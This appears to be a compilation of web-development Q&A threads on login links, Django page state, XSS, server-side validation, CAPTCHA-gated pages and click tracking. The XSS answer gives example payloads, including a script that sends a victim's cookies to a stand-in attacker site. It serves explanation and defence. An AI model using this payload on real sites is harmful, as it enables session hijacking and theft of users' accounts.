I am trying to add a hyperlink to an area of another website requiring login to view files. The target website will be a photo gallery website which then will be accessible on my website.
My question is this. Is it possible to encode login information into a hyperlink therefore bypassing login when hyperlink is clicked? Please let me know your thoughts.
Short answer: Client-side, this would be near-impossible, considering you cannot send form data via a hyperlink (though you can receive it, but then that gets dynamically added to the URL via method POST.) You can do this, however, by using Javascript by using a submit button (if the page doesn't have protection against csrf) which can dynamically inject parameters via a form, but then you would need a POST request cross-domain which is where my point with needing admin access comes in;
If you were to attempt to do this server-side, you would have to have admin access to both sites, certainly not just to site A. From then you can inject parameters into the hyperlinks via server-side scripting languages such as PHP or Python, which would then add the required information to the form upon landing on site B. But you must (must) be careful, this opens up the potential of a serious security compromise depending on how you allow users to log in to your site. Assuming it's yours. Either way, this is still a bad idea, which concludes to my
Shorter answer: No.
Related
Suppose we have a login page where, in the first stage, we are asked to enter our email. We send this information to the server, which searches whether there is an account with this email, and if there is, our goal is to change the state of the page, to a page where the user is asked to enter the password for this account. If, on the other hand, there is no account with that email, the state of the page changes to one where the user signs up. And let's say that, for the sake of aesthetics, all this happens using the same url.
My question is, what is the correct way to inform the client's page to what stage to go into?
Sending the whole html code is an option, but this seems like it will put too much pressure on the server. Is there a cleaner way, that we can send less information, and still be able to have the same result?
I am new to django and web dev so please explain thoroughly.
For a browser engine submitting a form with email is a new page request and a new rendering of HTML after that. The source of new HTML code is your server with Django, so you should generate a new HTML with a relevant template and send it as a response.
Such user provoked events change a state of your application for a given user session, not a page.
For speed you can use caches for styles, for menus, for HTML snippets (headers and footers).
Also you can make a one-page application, but you must use JavaScript framework for it. Then your JavaScript code executing in client's browser can request concise JSON with necessary information instead of full HTML.
Then your JavaScript framework is responsible for a correct insert new dynamic HTML elements in the current document object model (DOM).
Regarding XSS, OWASP states (intro paragraph):
These scripts can even rewrite the content of the HTML page
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.
When I cannot do it as a user, how can possibly a maliciously injected script from facebook.com, executed by my browser, rewrite the contents of facebook.com?
As a user, I cannot rewrite the contents of facebook.com
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
That would require me to permanently alter their html files, which clearly no user without specific server access can do.
No, you could simply modify the page client-side once your malicious script is loaded. No need to actually modify the original page to have the effect of wiping out the page. For example:
document.body.innerHTML = '';
Let me give some example. Let's imagine Facebook lets its users to save a link to externally hosted avatar at user's profile. And this avatar is shown near user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).
Then the attacker can use such text instead of avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying avatar may look as:
<img src="javascript:alert('You are hacked')"></img>
Then attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. Let the attacker write some post - and all his friends will see the alert on their newsfeed page.
And to finalize: instead of alert the attacker will be able to get user's Facebook cookies and send them to attacker's site:
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
And then he'll collect victim's cookies from his server's access log. Now it is a real hazard, do you agree?
Note. Here I described stored XSS: it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect current user - but that doesn't mean they are not dangerous: for example they can steal user's cookies as well.
Imagine that in a HTML file I have a disabled button. I might as well use Firebug to enable this button and so do the submission.
My question is: is there any way I disable this button and not allow this submission even when I modify the disabled property of the button in Firebug?
Should I always have to treat this problem on server side, thinking that this possibility could happen?
Yes, you should always validate server-side . The client-side validation is just to facilitate correction by the customer and provide interactivity with him, thus preventing him submit all data and only then discover the correct format or a missing field and then be forced to repopulate all the fields.
The form may have been easily incorporated into another web site and then the action of the form directed to your website or the user inject some malicious code/data in the form. (See: Wikipedia XSS )
Any malicious user can easily bypass a disabled HTML button to activate it by making Firebug or worse, even if you could prevent it, he can simply create an HTML page and point to your destination URL in the form action, or even without creating a page, make an AJAX request. He may even develop a tool for this using PHP with cURL (or sockets ) library or any other programming language like . NET using a WebClient/WebRequest or Java with HttpURLConnection which in both cases are exactly what a browser would do to request a page or send data to another... (And this task can be done in 5 minutes by any Junior Developer)
You should never rely on the user and should never consider client-side validation as a part of security flow, since by being client-side, any information from there can easily be manipulated as has exemplified above.
I have a feedback page in my website. In my website's homepage, when someone clicks on 'Feedback', it will open a modal window to ask a human verification question. If the response is correct, i want to programatically open the url to my feedback page.
My concerns is:
The feedback page should not be accessible by directly entering the url,i.e., www.mysite\feedback.html. How can i prevent this from opening my feedback page?
I'm also aware that my anti-spamming effort isnt the best option, but for now i dont need a robust mechanism.
Any solution?
Thanks.
Why don't you just put the CAPTCHA on your feedback page?
If that's not an option you need to use sessions to store the "captcha passed" flag and check for it on the contact page (also in your server-side code). After successfully submitting the form you need to clear the flag so someone cannot spam manually after completing just a single captcha.
You should be able to access the Referrer header of the request in your web platform. You can check this value to see if the referrer is from a page you accept. If not, you can return a 403 or whatever response, and if so, you can return the actual page. You will need access to a server-side framework, such as PHP or ASP.NET. Note, however, that it is easy to create HTTP requests and spoof the Referrer header.
I have and link like this (plain html)
<div>
My link
<p>When a user clicks on this "my Link" I need to make a get call to fetch a small image from server for tracking purposes</p>
</div>
The user must be directed to his link location but the fetching of the image from server must be done in background.
I can add something static like this
<img src ="image location for tracker">
but how can i associate it with user clicks.
Without the use of JavaScript I think what you have mentioned would be quite difficult to achieve (but happy to be proved wrong). My question back would be does you hosting allow for any type of simple server side scripting?
If yes, you could make the links point to a simple php or classic asp page which can do the image call or execute the tracking code then redirect the user to the original destination.